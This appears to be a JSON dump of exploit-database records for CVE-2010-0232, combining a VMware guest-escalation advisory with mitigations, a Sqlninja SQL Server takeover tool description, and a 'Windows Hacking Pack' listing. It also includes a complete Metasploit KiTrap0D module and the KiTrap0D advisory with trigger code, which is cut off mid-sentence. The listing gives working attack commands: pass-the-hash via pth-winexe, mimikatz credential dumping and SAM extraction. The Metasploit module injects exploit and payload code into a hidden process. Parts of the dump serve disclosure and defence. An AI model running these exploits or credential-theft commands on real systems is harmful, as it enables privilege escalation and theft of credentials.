\ndesktops and calls \"ChangeDisplaySettings(NULL, CDS_RESET)\" while \nattached to each, although some amount of display flickering is \nnevertheless inevitable. \n \n \nMITIGATION \n---------- \n \n* Disable NTVDM in the guest operating system \n \nDisabling Virtual DOS Machine (NTVDM) support in the guest should deny \nan unprivileged user the ability to obtain a writable mapping of ROM \non affected versions of Windows, thereby preventing exploitation of \nthe vulnerability. To disable NTVDM, follow the guidance presented in \none of the following Microsoft Knowledge Base Articles: \n \nhttp://support.microsoft.com/kb/979682 \nhttp://support.microsoft.com/kb/220159 \n \nOr, manually set the \"VDMDisallowed\" registry value, which is \nmentioned on the following page: (Note that this registry value is \nnot recognized by all versions of Windows.) \n \nhttp://technet.microsoft.com/en-us/library/cc783069.aspx \n \nBe aware that disabling NTVDM will break 32-bit applications that rely \non DOS functionality, in addition to 16-bit applications. \n \n* Run untrusted programs in a Remote Desktop session, and do not allow \nthe guest to power down or restart \n \nThe most likely exploitation scenarios require that the attack code be \nable to trigger a kernel BIOS call, which is most easily accomplished \nby changing the guest's video mode. Running suspect code in a Remote \nDesktop session--as opposed to a console session--prevents the code \nfrom changing the video mode, thereby reducing the likelihood of \nsuccessful elevation to kernel privileges. (Of course, make sure that \ndangerous Remote Desktop features, such as local drive sharing, are \ndisabled when running untrusted code in this way.) \n \nAnother feasible exploitation scenario involves overwriting the BIOS \nand then causing a shutdown, a restart, or hibernation. Run untrusted \ncode in the guest as an unprivileged user without shutdown privileges, \nand force the virtual machine to power down afterwards; do not allow \nthe guest to gracefully power down or restart, as that might give \nmodified code an opportunity to execute. \n \nBecause this workaround does not prevent modification of BIOS ROM, \nmalicious code could still attempt to exploit the vulnerability by \ncausing a blue-screen or planting code for other users' VDMs to \nexecute. \n \n* Disable the \"info-get\" and \"info-set\" commands \n \nExploitation depends on the attacker being able to overwrite ROM with \nthe contents of backdoor command responses, which the \"info-set\" and \n\"info-get\" commands facilitate by allowing the attacker to store and \nretrieve arbitrary data. These commands can be disabled in a specific \nguest by adding the following lines to the virtual machine's .vmx \nconfiguration file: \n \nisolation.tools.getInfo.disable = \"TRUE\" \nisolation.tools.setInfo.disable = \"TRUE\" \n \nNote that the second line also disables the \"SetGuestInfo\" command. \nIt is not known if disabling these commands disrupts any guest \nmonitoring or other VMware Tools functionality. \n \n* Restrict access to the VMware backdoor interface \n \nAdding the following line to the virtual machine's .vmx configuration \nfile will prevent unprivileged code (code with CPL > IOPL) from \naccessing the VMware backdoor interface, rendering the vulnerability \nunexploitable for the sake of privilege elevation: \n \nmonitor_control.restrict_backdoor = \"TRUE\" \n \nWith this setting in place, an unprivileged attempt to execute a \nVMware backdoor port I/O instruction will result in a privileged \ninstruction exception. Note that this setting crashes the user-mode \nportion of VMware Tools, and thus disrupts certain features such as \nguest-host copy-and-paste and drag-and-drop. \n \n \nCONCLUSION \n---------- \nThis document discloses a guest privilege elevation vulnerability \narising from fairly arcane behavior of VMware's backdoor interface, \nand makes a case for its exploitability by presenting at a high level \nthe steps performed by the author's own functioning proof of concept. \n \nIt is not known if other machine virtualization software is \nsusceptible to similar issues regarding incomplete emulation of \nread-only memory. \n \n \nGREETINGS \n--------- \nwww.ridgewayis.com \nwww.ftmband.com \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/111404/vmwarehb-escalate.txt", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "n0where": [{"lastseen": "2019-05-29T18:36:59", "description": "Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered. \n\n[ ![SQL Server Takeover Tool: Sqlninja documentation SQL Server Takeover SQL Server Takeover](//n0where.net/wp-content/uploads/2014/06/docum.png) ](<http://sqlninja.sourceforge.net/sqlninja-howto.html>)\n\n## SQL Server Takeover: Features \n\n * Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode) \n * Data extraction, time-based or via a DNS tunnel \n * Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection or just to upload Meterpreter \n * Upload of executables using only normal HTTP requests (no FTP/TFTP needed), via vbscript or debug.exe \n * Direct and reverse bindshell, both TCP and UDP \n * DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames \n * ICMP-tunneled shell, when no TCP/UDP ports are available for a direct/reverse shell but the DB can ping your box \n * Bruteforce of \u2018sa\u2019 password (in 2 flavors: dictionary-based and incremental) \n * Privilege escalation to sysadmin group if \u2018sa\u2019 password has been found \n * Creation of a custom xp_cmdshell if the original one has been removed \n * TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell \n * Evasion techniques to confuse a few IDS/IPS/WAF \n * Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping \n * Support for CVE-2010-0232, to escalate the privileges of sqlservr.exe to SYSTEM \n\n![SQL Server Takeover Tool: Sqlninja SQL Server Takeover SQL Server Takeover](//d21ic6tdqjqnyw.cloudfront.net/wp-content/uploads/2011/07/08110912/sql1.jpg)\n\n## Platforms supported \n\nSqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on: \n\n * Linux \n * FreeBSD \n * Mac OS X \n * iOS \n\nSqlninja does not run on Windows and we are not planning a port in the near future \n\n[ ![SQL Server Takeover Tool: Sqlninja download](https://d21ic6tdqjqnyw.cloudfront.net/wp-content/uploads/2016/05/08082805/Download3-1024x154.png) ](<http://sqlninja.sourceforge.net/download.html>)\n", "edition": 3, "cvss3": {}, "published": "2011-07-09T14:34:00", "title": "SQL Server Takeover Tool: Sqlninja", "type": "n0where", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0232"], "modified": "2011-07-09T14:34:00", "id": "N0WHERE:783", "href": "https://n0where.net/sql-server-takeover-tool-sqlninja", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2022-04-07T12:04:54", "description": "[![](https://1.bp.blogspot.com/-kAbsaRY3ZYc/WtzG74RycHI/AAAAAAAAK8s/IeNt1JiM-m0lgRGlsmsprTlMezEnqd6ggCLcBGAs/s1600/Windows-hack.jpg)](<https://1.bp.blogspot.com/-kAbsaRY3ZYc/WtzG74RycHI/AAAAAAAAK8s/IeNt1JiM-m0lgRGlsmsprTlMezEnqd6ggCLcBGAs/s1600/Windows-hack.jpg>)\n\n \n\n \n \n M$ Windows Hacking Pack\n ===========\n \n Tools here are from different sources. The repo is generally licensed with WTFPL, but some content may be not (eg. sysinternals).\n \"pes\" means \"PE Scambled\". It's useful sometimes.\n \n \n Remote Exploits\n ===========\n \n Windows 2000 / XP SP1\n MS05-039 Microsoft Plug and Play Service Overflow, Works with SSDP too\n http://www.rapid7.com/db/modules/exploit/windows/smb/ms05_039_pnp\n \n \n Windows XP/NT (beofre SP2)\n MS03-026 Microsoft RPC DCOM Interface Overflow (kaht2.zip)\n http://www.securityfocus.com/bid/8205/exploit\n \n \n Windows XP (SP2 and SP3) (can be used also for priv esc)\n MS08-067 Remote Stack Overflow [Vulnerability](<https://www.kitploit.com/search/label/Vulnerability>) Exploit (srvscv)\n https://www.exploit-db.com/exploits/7104/\n \n \n Windows Windows 7 and Server 2008 R2 (x64) All Service Packs\n MS17-010 aka \"Eternal Blue\"\n https://github.com/RiskSense-Ops/MS17-010\n \n \n Windows Server 2016 (DoS, may lead to exec)\n \"Fuzzing SMB\" video, showing the crash: https://www.youtube.com/watch?v=yDae5-lIQb8\n \n \n \n Privilege Escalation\n ===========\n \n First, if you have meterpreter, it may be a good idea to try \"getsystem\".\n \n \n srvcheck3.exe\n =====\n Privilege escalation for Windows XP SP2 and before\n This can exploit vulnerable services. http://seclists.org/fulldisclosure/2006/Feb/231\n Example: srvcheck3.exe -m upnphost -H 127.0.0.1 -c \"cmd.exe /c c:\\Inetpub\\wwwroot\\shell.exe\"\n \n \n KiTrap0D.tar\n =====\n Privilege escalation for Microsoft Windows NT/2000/XP/2003/Vista/2008/7\n MS10-015 / CVE-2010-0232 / https://www.exploit-db.com/exploits/11199/\n \n \n Other ways of [exploits](<https://www.kitploit.com/search/label/Exploits>) listed\n =====\n Windows XP/2003\n MS11-080 \u2192 Local [Privilege Escalation](<https://www.kitploit.com/search/label/Privilege%20Escalation>) Exploit Afd.sys\n https://www.exploit-db.com/exploits/18176/\n \n \n Windows Vista/7 \n CVE: 2010-4398 Elevation of Privileges (UAC Bypass) \n http://www.securityfocus.com/bid/45045/exploit\n \n \n Windows 8.1 (and before)\n MS14-058 \u2192 TrackPopupMenu Privilege Escalation\n https://www.exploit-db.com/exploits/37064/\n \n \n Windows 8.1 (and before)\n MS15-051 Win32k LPE vulnerability used in APT attack \"taihou32\"\n https://www.exploit-db.com/exploits/37049/\n \n \n Windows 10 (and before)\n Hot Potato (nbns spoof + wpad + smb ntlm)\n http://foxglovesecurity.com/2016/01/16/hot-potato/\n \n \n Windows 10 (and before)\n Link/URL based [exploitation](<https://www.kitploit.com/search/label/Exploitation>) of NetNTLM hashes. Eg. sending link file in email or dropping on file share.\n Technique presented here: https://www.youtube.com/watch?v=cuF_Ibo-mmM\n \n Windows XP SP2 (and before)\n srvcheck3.exe - upnp service or SSDPSRV service \n \n \n Windows XP/2003\n MS11-080 \u2192 Local Privilege Escalation Exploit Afd.sys\n https://www.exploit-db.com/exploits/18176/\n \n \n Windows Vista/7 \n CVE: 2010-4398 Elevation of Privileges (UAC Bypass) \n http://www.securityfocus.com/bid/45045/exploit\n \n \n Windows 8.1 (and before)\n MS14-058 \u2192 TrackPopupMenu Privilege Escalation\n https://www.exploit-db.com/exploits/37064/\n \n \n Windows 8.1 (and before)\n MS15-051 Win32k LPE vulnerability used in APT attack \"taihou32\"\n https://www.exploit-db.com/exploits/37049/\n \n \n Windows NT/2K/XP/2K3/Vista/2K8/7/8\n KiTrap0D - EPATHOBJ Local Ring Exploit\n https://www.exploit-db.com/exploits/11199/\n \n \n Windows 10 (and before)\n Hot Potato (nbns spoof + wpad + smb ntlm)\n http://foxglovesecurity.com/2016/01/16/hot-potato/\n \n \n Windows XP (and after)\n .lnk exploit for receiving NetNTLM hashes remotely.\n https://www.youtube.com/watch?v=cuF_Ibo-mmM\n \n \n Backup files if contain sam\n Windows/system32/config/SAM\n /WINDOWS/repair/SAM\n regedit.exe HKEY_LOCAL_MACHINE -> SAM\n \n Tools to get the SAM database if locked: pwdump, samdump, samdump2, Cain&Abel\n Otherwise just copy.\n \n \n Dump SAM through shadow volume\n If it can be created the database could be copied from this.\n Vista command: vssadmin create shadow\n Server 2008 command: diskshadow\n \n \n Windows Credentials Editor\n WCE / Windows Credentials Editor can recover password hashes from LSASS - http://www.ampliasecurity.com/research/wcefaq.html\n WCE supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions). \n \n \n Mimikatz dumping\n mimikatz # privilege::debug\n mimikatz # sekurlsa::logonpasswords\n mimikatz # lsadump::sam\n \n \n Cachedump aka In-memory attacks for SAM hashes / Cached Domain Credentials\n fgdump.exe (contains pwdump and cachedump, can read from memory)\n \n \n SAM dump (hive)\n \"A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data.\"\n \n \n Dump SAM, then spray hashes\n keimpx (try hashes with different users, against domain accounts)\n http://code.google.com/p/keimpx/\n \n \n LSA dumping (memory) / Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XP\n LSAdump2, LSASecretsDump, pwdumpx, gsecdump or Cain & Abel\n https://github.com/CoreSecurity/impacket\n http://packetstormsecurity.org/files/view/10457/lsadump2.zip\n http://www.nirsoft.net/utils/lsa_secrets_dump.html\n http://packetstormsecurity.org/files/view/62371/PWDumpX14.zip\n \n \n PassTheHash (before Windows 8.1)\n pth-winexe --user=pc.local/Administrator%aad3b435b51404eeaad3b435b514t234e:1321ae011e02ab0k26e4edc5012deac8 //10.1.1.1 cmd\n \n \n PassTheTicket (Kerberos)\n mimikatz can do it\n \n \n Duplicate Access Tokens (if admin access token can be used, it's win)\n http://sourceforge.net/projects/incognito/\n \n \n Token \"Kidnapping\"\n MS 09-12, Churrasco.bin shell.bin (runs shell.bin with nt system authority)\n http://carnal0wnage.attackresearch.com/2010/05/playing-with-ms09-012-windows-local.html\n \n \n Other notablelo tools\n psexec, smbshell, metasploit\u2019s psexec, etc\n https://github.com/BloodHoundAD/BloodHound - It allows to visualize connections in an AD domain and find fast escalation ways.\n \n \n \n To Be Added\n ===========\n - http://www.nirsoft.net/ --> Stuff for dumping passwords\n - openvpn\n - evilgrade\n \n \n \n Hashes (SHA256) and [VirusTotal](<https://www.kitploit.com/search/label/VirusTotal>) scans\n ===========\n \n 8ee65368afcd98ea660f5161f9cbe0c4c08863018f28e5eb024d8db58b234333 AwesomerShell.tar\n 7487ec568b6e2547ef30957610e60df3089d916f043b02da1167959dd9e0c051 KiTrap0D.tar\n 96f17857f3eb28a7d93dad930bc099a3cb65a9a2afb37069bfd1ba5ec5964389 LICENSE.txt\n b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e ncat.exe\n da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b ncat_pes.exe\n be4211fe5c1a19ff393a2bcfa21dad8d0a687663263a63789552bda446d9421b nc.exe\n 56580f1eebdccfbc5ce6d75690600225738ddbe8d991a417e56032869b0f43c7 nmap-7.12-setup-gui.exe\n 0cb7c3d9c4a0ce86f44ab4d0db2de264b64abbb83ef453afe05f5fddf330a1c5 nmap-7.12-win32_commandline.zip\n 976c216119d5627afc9ad29fd4f72e38de3711d65419fda6482bc795e0ebf654 plink.exe\n 952aa0bfb7ea58669fb50b945a09e9e69cd178739c5d1281a45ecfc54cc7f92f srvcheck3.exe\n ca5214e14ed5e879dd000a8a13895c474c89248386e9d337dd43f105a70f4170 PEScrambler.exe\n ef0f4bf2267b866a00b3e60c0e70f7f37cc5529fee417a625e502b3c93d215d9 SysinternalsSuite.zip\n 8e9bc40efd17a37a4ecf7ada7a3d739f343e207abe4e17f05a531baccc607336 windows-privesc-check.exe\n 6c367696e6cc8e6093426dbd19daf13b2375b0c078387ae6355519522d23b0fd windows-privesc-check.py\n ffe3808989bdfe986b17023e5d6583d49d644182e81234dc1db604e260ba76c9 fgdump.exe\n c36225d4515a92b905f8337acfd3d365cb813a2654e65067dbdba4fc58e7126a kaht2.zip\n 2951e49efbc9e18d4641c0061f10da021b4bca2bd51247fe80107cbd334c195d mimikatz_2-1.zip\n 0682a92bc96a66cf3e3eca1e44296838b9baad4feef0c391fc48044e039e642a ms08-067_exploit_31874.py\n cc4b4eceb04142b9e0794be029302feb33cf58c6a0cd1fdca3ff611df9b83827 ms08-067_exploit_7132.py\n 950bbdde2cc92799675c138fd8dfb2b60f0c01759533bc1a6993559508bd131e Responder.tar\n 54bd6cccf4c74604eb9956ce167a3ea94a06fabf4954e691d020023f8827c448 samdump2.exe\n ece925f85dc15b816dacacbb92ad41045f0cc58c2e10c5d3b66723ae11cf65c8 wce_getlsasrvaddr.exe\n c6333c684762ed4b4129c7f9f49c88c33384b66dfb1f100e459ec6f18526dff7 wce_v1_41beta_universal.exe\n ecbac2a6c0bf8dbc7bed2370ed098cd43a56b0d69a0db1d5715751270711f1d6 wce_v1_42beta_x32.exe\n \n 5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976 sources/nc110.tgz\n 47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9 sources/rdp2tcp-0.1.tar.gz\n 33d109696d22b7e89f4eac6d07f4b4461551247ce2bfcbead09373ce39364f78 sources/srvcheck3.zip\n f706df25bb061a669b13ff76c121a8d72140406c7b0930bae5dcf713f9520a56 sources/3proxy-0.8.6.tar.gz\n 7e8cfbf10bcc91fa9b9a60d3335d4a52bd6d4b6ca888533dbdd2afc86bebb5cc sources/3proxy-0.9-devel.tgz\n dec12905822ea64676d0ec58b62c00631ef8ddde2c700ffe74bfcf9026f17d81 sources/fgdump-2.1.0.tar.bz2\n 352888e441be33ae6266cfac1a072d52cfaafd65cc33b07daa51600f1cd803ca sources/impacket_0-9-15.tar\n 21faf49ae9ff08054214675f18d813bcf042798c325d68ae8b2417a119b439f4 sources/keimpx-0.3-dev.tar\n 16136256911c31f7c56eef415b11e14c13abe89cface46df78033456194eddfd sources/mimikatz-2016-06.zip\n 602659af30c565750fa01650e0a223d26355b5df98f2fbc30e3a6c593ed4e526 sources/samdump2-3.0.0.tar.bz2\n \n \n ncat.exe\n SHA256: b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e\n https://virustotal.com/en/file/b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e/analysis/1466258994/\n \n ncat_pes.exe\n SHA256: da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b \n https://virustotal.com/en/file/da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b/analysis/1466259528/\n \n nc110.tgz\n SHA256: 5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976\n https://virustotal.com/en/file/5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976/analysis/1466258410/\n \n rdp2tcp-0.1.tar.gz\n SHA256: 47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9\n https://virustotal.com/en/file/47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9/analysis/1466271163/\n \n\n \n \n\n\n**[Download WHP](<https://github.com/51x/WHP>)**\n", "cvss3": {}, "published": "2018-04-22T21:32:00", "type": "kitploit", "title": "WHP - Microsoft Windows Hacking Pack", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0232"], "modified": "2018-04-22T21:33:00", "id": "KITPLOIT:9023364724481532416", "href": "http://www.kitploit.com/2018/04/whp-microsoft-windows-hacking-pack.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-20T07:25:29", "description": "This Metasploit module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll and is not supported on x64 editions of Windows.", "cvss3": {}, "published": "2013-11-15T00:00:00", "type": "zdt", "title": "Windows SYSTEM Escalation Via KiTrap0D", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2010-0232"], "modified": "2013-11-15T00:00:00", "id": "1337DAY-ID-21523", "href": "https://0day.today/exploit/description/21523", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/exploit/exe'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Post::File\r\n include Post::Windows::Priv\r\n\r\n def initialize(info={})\r\n super( update_info( info,\r\n 'Name' => 'Windows SYSTEM escalation via KiTrap0D',\r\n 'Description' => %q{\r\n This module will create a new session with SYSTEM privileges via the\r\n KiTrap0D exlpoit by Tavis Ormandy. If the session is use is already\r\n elevated then the exploit will not run. The module relies on kitrap0d.x86.dll,\r\n and is not supported on x64 editions of Windows.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Tavis Ormandy', # Original resesarcher and exploit creator\r\n 'HD Moore', # Port of Tavis' code to meterpreter module\r\n 'Pusscat', # Port of Tavis' code to meterpreter module\r\n 'OJ Reeves' # Port of meterpreter code to a windows local exploit\r\n ],\r\n 'Platform' => [ 'win' ],\r\n 'SessionTypes' => [ 'meterpreter' ],\r\n 'Targets' => [\r\n [ 'Windows 2K SP4 - Windows 7 (x86)', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'References' => [\r\n [ 'CVE', '2010-0232' ],\r\n [ 'OSVDB', '61854' ],\r\n [ 'MSB', 'MS10-015' ],\r\n [ 'EDB', '11199' ],\r\n [ 'URL', 'http://seclists.org/fulldisclosure/2010/Jan/341' ]\r\n ],\r\n 'DisclosureDate'=> \"Jan 19 2010\"\r\n ))\r\n\r\n end\r\n\r\n def check\r\n # Validate platform architecture\r\n if sysinfo[\"Architecture\"] =~ /x64|WOW64/i\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n # Validate OS version\r\n winver = sysinfo[\"OS\"]\r\n unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows 2008|Windows 7/\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n return Exploit::CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Exploit::Failure::None, 'Session is already elevated')\r\n end\r\n\r\n if check == Exploit::CheckCode::Safe\r\n fail_with(Exploit::Failure::NotVulnerable, \"Exploit not available on this system.\")\r\n end\r\n\r\n dll = ''\r\n offset = nil\r\n\r\n print_status(\"Launching notepad to host the exploit...\")\r\n cmd = \"notepad.exe\"\r\n opts = {'Hidden' => true}\r\n process = client.sys.process.execute(cmd, nil, opts)\r\n pid = process.pid\r\n host_process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)\r\n print_good(\"Process #{pid} launched.\")\r\n\r\n print_status(\"Reflectively injecting the exploit DLL into #{pid}...\")\r\n library_path = ::File.join(Msf::Config.data_directory, \"exploits\",\r\n \"CVE-2010-0232\", \"kitrap0d.x86.dll\")\r\n library_path = ::File.expand_path(library_path)\r\n ::File.open(library_path, 'rb') { |f| dll = f.read }\r\n pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))\r\n pe.exports.entries.each do |e|\r\n if e.name =~ /^\\S*ReflectiveLoader\\S*/\r\n offset = pe.rva_to_file_offset(e.rva)\r\n break\r\n end\r\n end\r\n # Inject the exloit, but don't run it yet.\r\n exploit_mem = inject_into_pid(dll, host_process)\r\n\r\n print_status(\"Exploit injected. Injecting payload into #{pid}...\")\r\n # Inject the payload into the process so that it's runnable by the exploit.\r\n payload_mem = inject_into_pid(payload.encoded, host_process)\r\n\r\n print_status(\"Payload injected. Executing exploit...\")\r\n # invoke the exploit, passing in the address of the payload that\r\n # we want invoked on successful exploitation.\r\n host_process.thread.create(exploit_mem + offset, payload_mem)\r\n\r\n print_good(\"Exploit finished, wait for (hopefully privileged) payload execution to complete.\")\r\n end\r\n\r\nprotected\r\n\r\n def inject_into_pid(payload, process)\r\n payload_size = payload.length\r\n payload_size += 1024 - (payload.length % 1024) unless payload.length % 1024 == 0\r\n payload_mem = process.memory.allocate(payload_size)\r\n process.memory.protect(payload_mem)\r\n process.memory.write(payload_mem, payload)\r\n return payload_mem\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-20] #", "sourceHref": "https://0day.today/exploit/21523", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2022-05-04T17:40:08", "description": "", "cvss3": {}, "published": "2010-01-19T00:00:00", "type": "exploitdb", "title": "Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2010-0232", "CVE-2010-0232"], "modified": "2010-01-19T00:00:00", "id": "EDB-ID:11199", "href": "https://www.exploit-db.com/exploits/11199", "sourceData": "Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11199.zip (KiTrap0D.zip)\r\nE-DB Note: Make sure to run \"vdmallowed.exe\" (pre-compiled) inside the subfolder.\r\n\r\n\r\n\r\nMicrosoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack\r\n-------------------------------------------------------------------------\r\n\r\nCVE-2010-0232\r\n\r\nIn order to support BIOS service routines in legacy 16bit applications, the\r\nWindows NT Kernel supports the concept of BIOS calls in the Virtual-8086 mode\r\nmonitor code. These are implemented in two stages, the kernel transitions to\r\nthe second stage when the #GP trap handler (nt!KiTrap0D) detects that the\r\nfaulting cs:eip matches specific magic values.\r\n\r\nTransitioning to the second stage involves restoring execution context and\r\ncall stack (which had been previously saved) from the faulting trap frame once\r\nauthenticity has been verified.\r\n\r\nThis verification relies on the following incorrect assumptions:\r\n\r\n - Setting up a VDM context requires SeTcbPrivilege.\r\n - ring3 code cannot install arbitrary code segment selectors.\r\n - ring3 code cannot forge a trap frame.\r\n\r\nThis is believed to affect every release of the Windows NT kernel, from\r\nWindows NT 3.1 (1993) up to and including Windows 7 (2009).\r\n\r\nWorking out the details of the attack is left as an exercise for the reader.\r\n\r\nJust kidding, that was an homage to Derek Soeder :-)\r\n\r\n- Assumption 0: Setting up a VDM context requires SeTcbPrivilege.\r\n\r\nCreating a VDM context requires EPROCESS->Flags.VdmAllowed to be set in order\r\nto access the authenticated system service, NtVdmControl(). VdmAllowed can\r\nonly be set using NtSetInformationProcess(), which verifies the caller has\r\nSeTcbPrivilege. If this is true, the caller is very privileged and can\r\ncertainly be trusted.\r\n\r\nThis restriction can be subverted by requesting the NTVDM subsystem, and then\r\nusing CreateRemoteThread() to execute in the context of the subsystem process,\r\nwhich will already have this flag set.\r\n\r\n- Assumption 1: ring3 code cannot install arbitrary code segment selectors.\r\n\r\nCpl is usually equal to the two least significant bits of cs and ss, and is\r\na simple way to calculate the privilege of a task. However, there is an\r\nexception, Virtual-8086 mode.\r\n\r\nReal mode uses a segmented addressing scheme in order to allow 16-bit\r\naddresses to access the 20-bit address space. This is achieved by forming\r\nphysical addresses from a calculation like (cs << 4) + (eip & 0xffff). The\r\nsame calculation is used to map the segmented real address space onto the\r\nprotected linear address space in Virtual-8086 mode. Therefore, I must be\r\npermitted to set cs to any value, and checks for disallowed or privileged\r\nselectors can be bypassed (PsSetLdtEnties will reject any selector where any\r\nof the three lower bits are unset, as is the case with the required cs pair).\r\n\r\n- Assumption 2: ring3 code cannot forge a trap frame.\r\n\r\nReturning to usermode with iret is a complicated operation, the pseudocode for\r\nthe iret instruction alone spans several pages of Intel's Software Developers\r\nManual. The operation occurs in two stages, a pre-commit stage and a\r\npost-commit stage. Using the VdmContext installed using NtVdmControl(), an\r\ninvalid context can be created that causes iret to fail pre-commit, thus\r\nforging a trap frame.\r\n\r\nThe final requirement involves predicting the address of the second-stage BIOS\r\ncall handler. The address is static in Windows 2003, XP and earlier operating\r\nsystems, however, Microsoft introduced kernel base randomisation in Windows\r\nVista. Unfortunately, this potentially useful exploit mitigation is trivial\r\nto defeat locally as unprivileged users can simply query the loaded module list\r\nvia NtQuerySystemInformation().\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAll 32bit x86 versions of Windows NT released since 27-Jul-1993 are believed to\r\nbe affected, including but not limited to the following actively supported\r\nversions:\r\n\r\n - Windows 2000\r\n - Windows XP\r\n - Windows Server 2003\r\n - Windows Vista\r\n - Windows Server 2008\r\n - Windows 7\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nUpon successful exploitation, the kernel stack is switched to an attacker\r\nspecified address.\r\n\r\nAn attacker would trigger the vulnerability by setting up a specially\r\nformed VDM_TIB in their TEB, using a code sequence like this:\r\n\r\n/* ... */\r\n // Magic CS required for exploitation\r\n Tib.VdmContext.SegCs = 0x0B;\r\n // Pointer to fake kernel stack\r\n Tib.VdmContext.Esi = &KernelStack;\r\n // Magic IP required for exploitation\r\n Tib.VdmContext.Eip = Ki386BiosCallReturnAddress;\r\n\r\n NtCurrentTeb()->Reserved4[0] = &Tib;\r\n/* ... */\r\n\r\nFollowed by\r\n\r\n/* ... */\r\n NtVdmControl(VdmStartExecution, NULL);\r\n/* ... */\r\n\r\nWhich will reach the following code sequence via the #GP trap handler,\r\nnt!KiTrap0D. Please note how the stack pointer is restored from the 